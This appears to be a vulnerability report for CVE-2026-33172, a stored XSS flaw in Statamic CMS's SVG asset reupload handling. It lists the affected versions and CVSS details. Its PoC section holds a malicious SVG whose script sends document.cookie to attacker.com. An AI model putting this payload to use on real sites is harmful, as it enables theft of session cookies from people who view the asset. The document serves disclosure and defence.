Security Vulnerability Report
CVE-2026-33172 CVSS 8.7 HIGH

Published: 2026-03-20 22:16:29
Last Modified: 2026-03-23 18:46:05

Description

Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.14 and 6.7.0, a stored XSS vulnerability in SVG asset reuploads allows authenticated users with asset upload permissions to bypass SVG sanitization and inject malicious JavaScript that executes when the asset is viewed. This has been fixed in 5.73.14 and 6.7.0.

Weakness: CWE-79 (Cross-site Scripting)

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:* - VULNERABLE (Statamic CMS < 5.73.14)
cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:* - VULNERABLE (Statamic CMS >= 6.0.0, < 6.7.0)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
svg
<!-- PoC for CVE-2026-33172: Stored XSS via SVG upload -->
<!-- Attacker creates a malicious SVG file and uploads it as an asset -->
<svg xmlns="http://www.w3.org/2000/svg" version="1.1">
  <circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" />
  <script type="text/javascript">
    alert('CVE-2026-33172 XSS Executed');
    // Malicious actions can be performed here, e.g., stealing cookies
    fetch('https://attacker.com/steal?cookie=' + document.cookie);
  </script>
</svg>

Note that the advisory places the sanitization bypass in the asset reupload path; the file above is only the script-bearing payload that the SVG sanitizer is meant to strip, and it is the reupload handling in the affected versions that lets it through.

References

Vendor Advisory: https://github.com/statamic/cms/security/advisories/GHSA-7rcv-55mj-chg7
